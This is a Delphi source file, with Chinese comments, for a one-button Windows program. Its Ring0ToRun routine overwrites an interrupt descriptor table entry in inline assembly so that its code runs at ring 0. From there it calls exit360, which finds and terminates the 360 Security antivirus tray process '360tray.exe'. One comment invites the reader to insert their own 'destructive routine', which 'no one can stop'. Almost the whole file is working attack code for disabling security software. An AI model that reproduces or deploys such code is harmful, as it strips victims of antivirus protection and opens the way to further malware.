unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, TlHelp32; type TForm1 = class(TForm) Button1: TButton; procedure Button1Click(Sender: TObject); private { Private declarations } public { Public declarations } end; procedure exit360; procedure Ring0ToRun; stdcall; var Form1: TForm1; implementation {$R *.dfm} procedure exit360; var id:Cardinal; sn:THandle; boo:Boolean; lpp:TProcessEntry32; phand:HWND; begin sn:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); lpp.dwSize:=SizeOf(lpp); try boo:=Process32First(sn,lpp); while boo do begin if lpp.szExeFile = '360tray.exe' then begin //Result:=lpp.szExeFile; id:=lpp.th32ProcessID; phand:=OpenProcess(PROCESS_ALL_ACCESS,False,id); GetWindowThreadProcessId(phand,id); TerminateProcess(phand,ExitCode); Break; end; boo:=Process32Next(sn,lpp); end; except end; end; procedure Ring0ToRun; stdcall; const ExceptionUsed = $03; // 中断号,也可以用其他的中断号,如$05等 var IDT:array [0..5] of byte; //保存中断描述符表,6字节 lpOldGate : DWORD; // 保存旧的中断向量,8个字节 begin asm sidt IDT //读入中断描述符表至IDt中 mov ebx, dword ptr [IDT+2] //IDT共6字节,第2~5字节是中断描述符表的基地址,基地址存入ebx中 add ebx, 8*ExceptionUsed //加上8x3个字节,因为每个中断向量占用8字节, cli //关中断,下面的代码是关键代码,不允许打断 mov dx, word ptr [ebx+6] //取中断向量的6,7字节 shl edx, 16d //左移16位,中断向量的6,7字节存入edx的高32位 mov dx, word ptr [ebx] //取中断向量的0,1字节,存入edx低32位 mov [lpOldGate], edx //保存中断向量至lpoldgate中 mov eax, offset @@Ring0Code //修改向量,指向Ring0级代码段 mov word ptr [ebx], ax shr eax, 16d mov word ptr [ebx+6], ax int ExceptionUsed // 发生中断,自动以ring0执行@@Ring0Code mov ebx, dword ptr [IDT+2] //重新读出中断描述符表 add ebx, 8*ExceptionUsed mov edx, [lpOldGate] mov word ptr [ebx], dx shr edx, 16d mov word ptr [ebx+6], dx //恢复被改了的向量 ret @@Ring0Code: //Ring0级代码段 push es push ds pushad //call SendCommand //这里调用你的破坏过程,无人可挡 call exit360 popad pop ds pop es iretd //中断返回 end; end; procedure TForm1.Button1Click(Sender: TObject); begin Ring0ToRun; end; end.